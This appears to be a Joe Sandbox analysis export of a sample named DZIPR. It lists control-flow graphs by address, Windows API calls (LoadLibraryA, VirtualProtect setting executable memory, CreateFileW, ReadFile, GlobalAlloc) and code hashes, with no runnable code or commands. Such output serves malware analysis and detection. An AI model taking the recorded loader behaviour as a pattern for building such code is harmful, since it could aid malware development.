                                        control_flow_graph 25 6c9163f0-6c9163f8 26 6c91649c-6c9164c1 25->26 27 6c9163fe-6c91640f 25->27 28 6c9164c3 26->28 29 6c916524 26->29 30 6c916413-6c91641e 27->30 31 6c9164c5-6c9164cb 28->31 34 6c916526-6c916551 29->34 32 6c916481 30->32 33 6c916420 30->33 31->31 37 6c9164cd-6c9164cf 31->37 39 6c916483-6c916487 32->39 38 6c916422-6c916427 33->38 35 6c9165f1 34->35 36 6c916557-6c916568 34->36 43 6c9165f3-6c916661 LoadLibraryA VirtualProtect call 6c9167f8 VirtualProtect 35->43 40 6c91656c-6c916577 36->40 37->29 41 6c9164d1-6c9164d7 37->41 38->38 42 6c916429-6c91642b 38->42 44 6c91671b-6c91671e 39->44 45 6c91648d-6c916492 39->45 46 6c916579 40->46 47 6c9165da 40->47 48 6c9166f0 41->48 49 6c9164dd-6c9164e6 41->49 42->32 50 6c91642d-6c916433 42->50 59 6c916663 43->59 60 6c916682-6c9166a9 43->60 45->30 52 6c916498 45->52 54 6c91657b-6c916580 46->54 55 6c9165dc-6c9165e0 47->55 56 6c9164ea-6c916501 49->56 57 6c9166e6 50->57 58 6c916439-6c916443 50->58 52->26 54->54 61 6c916582-6c916584 54->61 63 6c916704-6c916716 55->63 64 6c9165e6-6c9165eb 55->64 56->56 65 6c916503-6c916513 56->65 66 6c9166fa 57->66 62 6c916447-6c91645e 58->62 67 6c916667-6c916680 59->67 61->47 68 6c916586-6c91658c 61->68 62->62 69 6c916460-6c916471 62->69 63->43 64->35 64->40 65->34 70 6c916515-6c916522 65->70 66->63 67->60 67->67 68->66 72 6c916592-6c91659c 68->72 69->39 73 6c916473-6c91647f 69->73 70->34 74 6c9165a0-6c9165b7 72->74 73->39 74->74 75 6c9165b9-6c9165ca 74->75 75->55 76 6c9165cc-6c9165d8 75->76 76->55
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00000000), ref: 6C916602
                                        • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C91663B
                                        • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6C916654
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: ProtectVirtual$LibraryLoad
                                        • String ID:
                                        • API String ID: 895956442-0
                                        • Opcode ID: f2ad1a0c7219b2fd2e5db772e71672e583ea498fdc023710c20e06f344bfa214
                                        • Instruction ID: 9a89e75fe34bad34f95949851d5e01885960c2a416b96b48172a99d0d84b7afa
                                        • Opcode Fuzzy Hash: f2ad1a0c7219b2fd2e5db772e71672e583ea498fdc023710c20e06f344bfa214
                                        • Instruction Fuzzy Hash: 00A1CD30A0C35A8FC315CF19C48162AFBE6FF89308F19896DE89997A56D730E955CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 105 6c915ca0-6c915d95 call 6c91af9c * 2 call 6c91afc3 * 2 call 6c9164e0 GetPEB 116 6c915de4 105->116 117 6c915d97 105->117 118 6c915de6-6c915e1d 116->118 119 6c915d99-6c915da3 117->119 120 6c915e23-6c915e3c 118->120 121 6c915eba-6c915f0c GlobalAlloc 118->121 122 6c915da5-6c915dab 119->122 123 6c915dd6-6c915dd8 119->123 126 6c915e40-6c915e4e 120->126 128 6c915f12-6c915f2b 121->128 129 6c915fad 121->129 127 6c915dae-6c915db5 122->127 124 6c9167e1-6c9167e4 123->124 125 6c915dde-6c915de2 123->125 124->118 125->116 125->119 130 6c915e50 126->130 131 6c915ea3 126->131 133 6c915dc1-6c915dcd 127->133 134 6c915db7-6c915dbd 127->134 135 6c915f2f-6c915f3d 128->135 132 6c915faf-6c915fce 129->132 140 6c915e52-6c915e58 130->140 139 6c915ea5-6c915ea9 131->139 154 6c915fd0 132->154 155 6c915fe7-6c915fea 132->155 133->127 138 6c915dcf-6c915dd3 133->138 134->133 141 6c915dbf 134->141 136 6c915f92 135->136 137 6c915f3f 135->137 142 6c915f94-6c915f98 136->142 143 6c915f41-6c915f47 137->143 138->123 144 6c9167c3-6c9167d8 139->144 145 6c915eaf-6c915eb4 139->145 140->140 146 6c915e5a-6c915e5c 140->146 141->133 151 6c9167a5-6c9167be 142->151 152 6c915f9e-6c915fa3 142->152 143->143 149 6c915f49-6c915f4b 143->149 145->126 150 6c915eb6 145->150 146->131 153 6c915e5e-6c915e64 146->153 149->136 159 6c915f4d-6c915f53 149->159 150->121 151->132 152->135 160 6c915fa5-6c915fa9 152->160 161 6c9166aa-6c9166af 153->161 162 6c915e6a-6c915e6e 153->162 156 6c915fd2-6c915fe5 154->156 157 6c915fec 155->157 158 6c915ffe-6c916038 155->158 156->155 156->156 163 6c915fee-6c915ffc 157->163 166 6c9160d9 158->166 167 6c91603e-6c916057 158->167 164 6c9166b4 159->164 165 6c915f59-6c915f5d 159->165 160->129 161->139 169 6c915e97-6c915ea1 161->169 162->121 163->158 163->163 177 6c9166be 164->177 171 6c915f5f-6c915f75 165->171 170 6c9160db-6c916139 CreateFileW 166->170 172 6c91605b-6c916069 167->172 169->139 179 6c91613f-6c91615c 170->179 180 6c9161de-6c916780 170->180 171->171 174 6c915f77-6c915f84 171->174 175 6c91606b 172->175 176 6c9160be 172->176 174->142 181 6c915f86-6c915f90 174->181 182 6c91606d-6c916073 175->182 178 6c9160c0-6c9160c4 176->178 183 6c916788-6c9167a0 177->183 178->183 184 6c9160ca-6c9160cf 178->184 179->124 181->142 182->182 186 6c916075-6c916077 182->186 183->170 184->172 187 6c9160d1-6c9160d5 184->187 186->176 188 6c916079-6c91607f 186->188 187->166 188->177 190 6c916085-6c916089 188->190 192 6c91608b-6c9160a1 190->192 192->192 194 6c9160a3-6c9160b0 192->194 194->178 196 6c9160b2-6c9160bc 194->196 196->178
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LibraryLoad_memset
                                        • String ID:
                                        • API String ID: 2997193564-0
                                        • Opcode ID: 1e4188ac96c2b19a66f8fbba2bdf0eed366604cf7c5d37f4aa78c5815407e02e
                                        • Instruction ID: eda0445fe0aba97647ec7a428adf108fad912dd0a8ea2d9a9fe06b892224bd87
                                        • Opcode Fuzzy Hash: 1e4188ac96c2b19a66f8fbba2bdf0eed366604cf7c5d37f4aa78c5815407e02e
                                        • Instruction Fuzzy Hash: 7CE18BB0A0870A8FC714DF1AC48162AFBF5FF89308F65896DE89987B11D730E855CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 355 6c915e70-6c915e86 355->355 356 6c915e88-6c915e8c 355->356 357 6c915e90-6c915e95 356->357 358 6c915ea5-6c915ea9 357->358 359 6c915e97-6c915ea1 357->359 360 6c9167c3-6c9167d8 358->360 361 6c915eaf-6c915eb4 358->361 359->358 363 6c915e40-6c915e4e 361->363 364 6c915eb6 361->364 366 6c915e50 363->366 367 6c915ea3 363->367 365 6c915eba-6c915f0c GlobalAlloc 364->365 369 6c915f12-6c915f2b 365->369 370 6c915fad 365->370 368 6c915e52-6c915e58 366->368 367->358 368->368 371 6c915e5a-6c915e5c 368->371 373 6c915f2f-6c915f3d 369->373 372 6c915faf-6c915fce 370->372 371->367 376 6c915e5e-6c915e64 371->376 385 6c915fd0 372->385 386 6c915fe7-6c915fea 372->386 374 6c915f92 373->374 375 6c915f3f 373->375 377 6c915f94-6c915f98 374->377 378 6c915f41-6c915f47 375->378 379 6c9166aa-6c9166af 376->379 380 6c915e6a-6c915e6e 376->380 383 6c9167a5-6c9167be 377->383 384 6c915f9e-6c915fa3 377->384 378->378 382 6c915f49-6c915f4b 378->382 379->357 380->365 382->374 390 6c915f4d-6c915f53 382->390 383->372 384->373 391 6c915fa5-6c915fa9 384->391 387 6c915fd2-6c915fe5 385->387 388 6c915fec 386->388 389 6c915ffe-6c916038 386->389 387->386 387->387 392 6c915fee-6c915ffc 388->392 395 6c9160d9 389->395 396 6c91603e-6c916057 389->396 393 6c9166b4 390->393 394 6c915f59-6c915f5d 390->394 391->370 392->389 392->392 404 6c9166be 393->404 398 6c915f5f-6c915f75 394->398 397 6c9160db-6c916139 CreateFileW 395->397 399 6c91605b-6c916069 396->399 406 6c91613f-6c9167e4 397->406 407 6c9161de-6c916780 397->407 398->398 401 6c915f77-6c915f84 398->401 402 6c91606b 399->402 403 6c9160be 399->403 401->377 408 6c915f86-6c915f90 401->408 409 6c91606d-6c916073 402->409 405 6c9160c0-6c9160c4 403->405 410 6c916788-6c9167a0 404->410 405->410 411 6c9160ca-6c9160cf 405->411 406->365 421 6c915e23-6c915e3c 406->421 408->377 409->409 413 6c916075-6c916077 409->413 410->397 411->399 414 6c9160d1-6c9160d5 411->414 413->403 416 6c916079-6c91607f 413->416 414->395 416->404 419 6c916085-6c916089 416->419 422 6c91608b-6c9160a1 419->422 421->363 422->422 424 6c9160a3-6c9160b0 422->424 424->405 426 6c9160b2-6c9160bc 424->426 426->405
                                        APIs
                                        • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6C915ECA
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: AllocGlobal
                                        • String ID:
                                        • API String ID: 3761449716-0
                                        • Opcode ID: 3ee80c8733a0a28248d7c5b971d5973264048f088364e0b9435cb9b8821bf90e
                                        • Instruction ID: 1e23d36b4a3cd88fad73e3e742af38859ee946538d685c5109d56c047f99d1fd
                                        • Opcode Fuzzy Hash: 3ee80c8733a0a28248d7c5b971d5973264048f088364e0b9435cb9b8821bf90e
                                        • Instruction Fuzzy Hash: F4A19F70A0C30A8FC708DF19C49163AB7E6FF89308F25856DE89687B56D770E965CB81

                                        Control-flow Graph

                                        APIs
                                        • RtlEnterCriticalSection.NTDLL(6C9432EC), ref: 6C91BC61
                                        • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,6C9432D0,6C9432D0,?,6C91C0A4,00000004,6C91AF00,6C916DDD,6C9168AD,?,6C924902,?), ref: 6C91BCB7
                                        • GlobalHandle.KERNEL32(00E7C9A8), ref: 6C91BCC0
                                        • GlobalUnlock.KERNEL32(00000000), ref: 6C91BCCA
                                        • GlobalReAlloc.KERNEL32(?,00000000,00002002), ref: 6C91BCE3
                                        • GlobalHandle.KERNEL32(00E7C9A8), ref: 6C91BCF5
                                        • GlobalLock.KERNEL32(00000000), ref: 6C91BCFC
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BD05
                                        • GlobalLock.KERNEL32(00000000), ref: 6C91BD11
                                        • _memset.LIBCMT ref: 6C91BD2B
                                        • RtlLeaveCriticalSection.NTDLL(00000000), ref: 6C91BD59
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                                        • String ID:
                                        • API String ID: 496899490-0
                                        • Opcode ID: 76542adbc2fe5cdfbd252f580aeea79782363df4a9de268fe4764d1e884d76b1
                                        • Instruction ID: 2f5d7fce34b392837f71a77927cb3151517a44a73a10d15f9e3c4e59b764a2ac
                                        • Opcode Fuzzy Hash: 76542adbc2fe5cdfbd252f580aeea79782363df4a9de268fe4764d1e884d76b1
                                        • Instruction Fuzzy Hash: E531E4B1608708AFDB248FA8C84AA5A7BFAFF44304B14496EE556D7F10DB70F944CB94

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 77 6c9164e0-6c9164e8 78 6c9164ea-6c916501 77->78 78->78 79 6c916503-6c916513 78->79 80 6c916515-6c916522 79->80 81 6c916526-6c916551 79->81 80->81 82 6c9165f1 81->82 83 6c916557-6c916568 81->83 85 6c9165f3-6c916661 LoadLibraryA VirtualProtect call 6c9167f8 VirtualProtect 82->85 84 6c91656c-6c916577 83->84 86 6c916579 84->86 87 6c9165da 84->87 92 6c916663 85->92 93 6c916682-6c9166a9 85->93 90 6c91657b-6c916580 86->90 91 6c9165dc-6c9165e0 87->91 90->90 94 6c916582-6c916584 90->94 95 6c916704-6c916716 91->95 96 6c9165e6-6c9165eb 91->96 97 6c916667-6c916680 92->97 94->87 98 6c916586-6c91658c 94->98 95->85 96->82 96->84 97->93 97->97 100 6c916592-6c91659c 98->100 101 6c9166fa 98->101 102 6c9165a0-6c9165b7 100->102 101->95 102->102 103 6c9165b9-6c9165ca 102->103 103->91 104 6c9165cc-6c9165d8 103->104 104->91
                                        APIs
                                        • LoadLibraryA.KERNELBASE(00000000), ref: 6C916602
                                        • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6C91663B
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: LibraryLoadProtectVirtual
                                        • String ID:
                                        • API String ID: 3279857687-0
                                        • Opcode ID: 4662a576adbf947e9f92a86eeceb754c3f01d54ad8662a0ae5fd6a6318481d00
                                        • Instruction ID: cb61a0c260090c014d3802f1310ad85770562c9686076dc7d015b45cf1cc5365
                                        • Opcode Fuzzy Hash: 4662a576adbf947e9f92a86eeceb754c3f01d54ad8662a0ae5fd6a6318481d00
                                        • Instruction Fuzzy Hash: 3551D030A0C35A8FC715CF18C88062AFBE6EFC9308F19896DE88587716C630E906CB91

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 197 6c916750-6c916762 ReadFile 199 6c9161f0-6c916207 197->199 200 6c91630a-6c916323 197->200 201 6c916325-6c916329 200->201 202 6c91634d-6c916368 200->202 203 6c916738 201->203 204 6c91632f 201->204 205 6c9163cb 202->205 206 6c91636a 202->206 203->197 209 6c916331-6c91633c 204->209 208 6c9163cd-6c9163ee 205->208 210 6c91636c-6c916372 206->210 211 6c9166dc 208->211 209->209 212 6c91633e-6c916347 209->212 210->210 213 6c916374-6c916376 210->213 211->203 212->202 214 6c916349 212->214 213->205 215 6c916378-6c91637e 213->215 214->202 215->211 216 6c916384-6c91638d 215->216 217 6c916391-6c9163a8 216->217 217->217 218 6c9163aa-6c9163ba 217->218 218->208 219 6c9163bc-6c9163c9 218->219 219->208
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C93C168), ref: 6C916300
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: c3a6051868806f7f8124935c01b491f59872f1864718a4c3efeb1d9d902016c7
                                        • Instruction ID: f2d3736d8f172eebe95c3fb4b4146ad580683dd9b72c424af3a743f5014f06c6
                                        • Opcode Fuzzy Hash: c3a6051868806f7f8124935c01b491f59872f1864718a4c3efeb1d9d902016c7
                                        • Instruction Fuzzy Hash: 6F41B031A0C7498FC708CF09C88167AB7F6FBC5318F19896DE88987B15D631E856CB80

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 220 6c9162d0-6c9162d5 221 6c916742-6c91674e 220->221 222 6c9162db-6c9162e0 220->222 223 6c9162e2-6c9162f1 222->223 224 6c91626d-6c91627b 222->224 229 6c9162f3-6c916304 ReadFile 223->229 226 6c91627d 224->226 227 6c9162cf 224->227 230 6c91627f-6c916284 226->230 228 6c9162d1-6c9162d5 227->228 228->221 228->222 231 6c9161f0-6c916207 229->231 232 6c91630a-6c916323 229->232 230->230 233 6c916286-6c916288 230->233 234 6c916325-6c916329 232->234 235 6c91634d-6c916368 232->235 233->227 236 6c91628a-6c916290 233->236 237 6c916738-6c916762 234->237 238 6c91632f 234->238 239 6c9163cb 235->239 240 6c91636a 235->240 242 6c9166d2 236->242 243 6c916296-6c91629a 236->243 237->229 246 6c916331-6c91633c 238->246 245 6c9163cd-6c9163ee 239->245 247 6c91636c-6c916372 240->247 242->221 244 6c91629c-6c9162b2 243->244 244->244 248 6c9162b4-6c9162c1 244->248 249 6c9166dc 245->249 246->246 250 6c91633e-6c916347 246->250 247->247 252 6c916374-6c916376 247->252 248->228 253 6c9162c3-6c9162cd 248->253 249->237 250->235 254 6c916349 250->254 252->239 255 6c916378-6c91637e 252->255 253->228 254->235 255->249 256 6c916384-6c91638d 255->256 257 6c916391-6c9163a8 256->257 257->257 258 6c9163aa-6c9163ba 257->258 258->245 259 6c9163bc-6c9163c9 258->259 259->245
                                        APIs
                                        • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6C93C168), ref: 6C916300
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: e9b9dd3690da5cb15317c2a127db35814a2837f31c29f55f43cfd712a9cd74af
                                        • Instruction ID: e3658cca07bd586bd5f33d6f012638cdd4266a5557dc767f7c43cdfbd557bb4a
                                        • Opcode Fuzzy Hash: e9b9dd3690da5cb15317c2a127db35814a2837f31c29f55f43cfd712a9cd74af
                                        • Instruction Fuzzy Hash: 1031CE32A0C74A8FC708CF08C88167AB7E6EBC5314F19C96CE89597B16D630F856CB81

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 260 6c91c050-6c91c068 call 6c9250c9 263 6c91c06a call 6c916dc1 260->263 264 6c91c06f-6c91c072 260->264 263->264 266 6c91c074-6c91c07c 264->266 267 6c91c0aa-6c91c0bb call 6c91ba5b 264->267 269 6c91c09f call 6c91bc4e 266->269 270 6c91c07e-6c91c09d call 6c91bd66 266->270 275 6c91c0d0-6c91c0d7 call 6c9251a1 267->275 276 6c91c0bd-6c91c0cb call 6c91be0d 267->276 274 6c91c0a4-6c91c0a8 269->274 270->263 270->269 274->263 274->267 276->275
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C91C057
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: H_prolog3$Exception@8Throw
                                        • String ID:
                                        • API String ID: 2489616738-0
                                        • Opcode ID: f840cdaf80a800fb6fd92509b49d44779c7f38f306811b54306dee07a0d0e0af
                                        • Instruction ID: 6cd78edf0468d844fea81680e85e46f0c1bbb4e1f0a9d0da46e6716e37328a3d
                                        • Opcode Fuzzy Hash: f840cdaf80a800fb6fd92509b49d44779c7f38f306811b54306dee07a0d0e0af
                                        • Instruction Fuzzy Hash: E3019A7070821ACBDB18BE3188222AD36B6BB60359F20853CE4928BF90DF31C945CB50

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 282 6c9160f0-6c916139 CreateFileW 283 6c91613f-6c9167e4 282->283 284 6c9161de-6c916780 282->284 290 6c915e23-6c915e3c 283->290 291 6c915eba-6c915f0c GlobalAlloc 283->291 293 6c915e40-6c915e4e 290->293 294 6c915f12-6c915f2b 291->294 295 6c915fad 291->295 297 6c915e50 293->297 298 6c915ea3 293->298 300 6c915f2f-6c915f3d 294->300 299 6c915faf-6c915fce 295->299 304 6c915e52-6c915e58 297->304 303 6c915ea5-6c915ea9 298->303 317 6c915fd0 299->317 318 6c915fe7-6c915fea 299->318 301 6c915f92 300->301 302 6c915f3f 300->302 305 6c915f94-6c915f98 301->305 306 6c915f41-6c915f47 302->306 307 6c9167c3-6c9167d8 303->307 308 6c915eaf-6c915eb4 303->308 304->304 309 6c915e5a-6c915e5c 304->309 314 6c9167a5-6c9167be 305->314 315 6c915f9e-6c915fa3 305->315 306->306 312 6c915f49-6c915f4b 306->312 308->293 313 6c915eb6 308->313 309->298 316 6c915e5e-6c915e64 309->316 312->301 322 6c915f4d-6c915f53 312->322 313->291 314->299 315->300 323 6c915fa5-6c915fa9 315->323 324 6c9166aa-6c9166af 316->324 325 6c915e6a-6c915e6e 316->325 319 6c915fd2-6c915fe5 317->319 320 6c915fec 318->320 321 6c915ffe-6c916038 318->321 319->318 319->319 326 6c915fee-6c915ffc 320->326 329 6c9160d9 321->329 330 6c91603e-6c916057 321->330 327 6c9166b4 322->327 328 6c915f59-6c915f5d 322->328 323->295 324->303 332 6c915e97-6c915ea1 324->332 325->291 326->321 326->326 339 6c9166be 327->339 334 6c915f5f-6c915f75 328->334 333 6c9160db-6c9160ef 329->333 335 6c91605b-6c916069 330->335 332->303 333->282 334->334 336 6c915f77-6c915f84 334->336 337 6c91606b 335->337 338 6c9160be 335->338 336->305 341 6c915f86-6c915f90 336->341 342 6c91606d-6c916073 337->342 340 6c9160c0-6c9160c4 338->340 343 6c916788-6c9167a0 339->343 340->343 344 6c9160ca-6c9160cf 340->344 341->305 342->342 345 6c916075-6c916077 342->345 343->333 344->335 346 6c9160d1-6c9160d5 344->346 345->338 347 6c916079-6c91607f 345->347 346->329 347->339 348 6c916085-6c916089 347->348 349 6c91608b-6c9160a1 348->349 349->349 350 6c9160a3-6c9160b0 349->350 350->340 351 6c9160b2-6c9160bc 350->351 351->340
                                        APIs
                                        • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6C9160F6
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CreateFile
                                        • String ID:
                                        • API String ID: 823142352-0
                                        • Opcode ID: 476ac34504fe3e55848c2e8a40cde727e4a0e75d46a5d5603e28f92b026bb9f7
                                        • Instruction ID: 8f239047dc673db5e911d9811fd1d75466b9c57eded723db0efcee373925f455
                                        • Opcode Fuzzy Hash: 476ac34504fe3e55848c2e8a40cde727e4a0e75d46a5d5603e28f92b026bb9f7
                                        • Instruction Fuzzy Hash: 3601E8B0A083019FC718DF0AC89090ABBF6FFC9308F26856DA84897316C630E851CF85

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 352 6c92a6f4-6c92a716 HeapCreate 353 6c92a71a-6c92a723 352->353 354 6c92a718-6c92a719 352->354
                                        APIs
                                        • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6C924776,00000001,?,?,?,6C9248EF,?,?,?,6C93E848,0000000C,6C9249AA), ref: 6C92A709
                                        Memory Dump Source
                                        • Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true
                                        • Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd
                                        Similarity
                                        • API ID: CreateHeap
                                        • String ID:
                                        • API String ID: 10892065-0
                                        • Opcode ID: 27a1119d218eab925c179ff2741093de0818835a91f0851e17aba456b5c97ea3
                                        • Instruction ID: 6c84610712efbd296c0bbc9f0e98e30d22176dec80e0afc253ff6e8a5060960d
                                        • Opcode Fuzzy Hash: 27a1119d218eab925c179ff2741093de0818835a91f0851e17aba456b5c97ea3
                                        • Instruction Fuzzy Hash: 8CD05E36B583449ADB14AEB15C48B663BFC938579AF248836F84CCA180E674C5809A48
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C917498
                                        • GetFullPathNameW.KERNEL32(00000000,00000104,00000000,?,00000268,6C9176D5,?,00000000,?,00000000,00000104,00000000,?,6C93BEF4,00000000), ref: 6C9174D6
                                          • Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
                                          • Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4
                                        • PathIsUNCW.SHLWAPI(?,00000000,?), ref: 6C917546
                                        • GetVolumeInformationW.KERNEL32(?,00000000,00000000,00000000,?,?,00000000,00000000), ref: 6C91756D
                                        • CharUpperW.USER32(00000000), ref: 6C9175A0
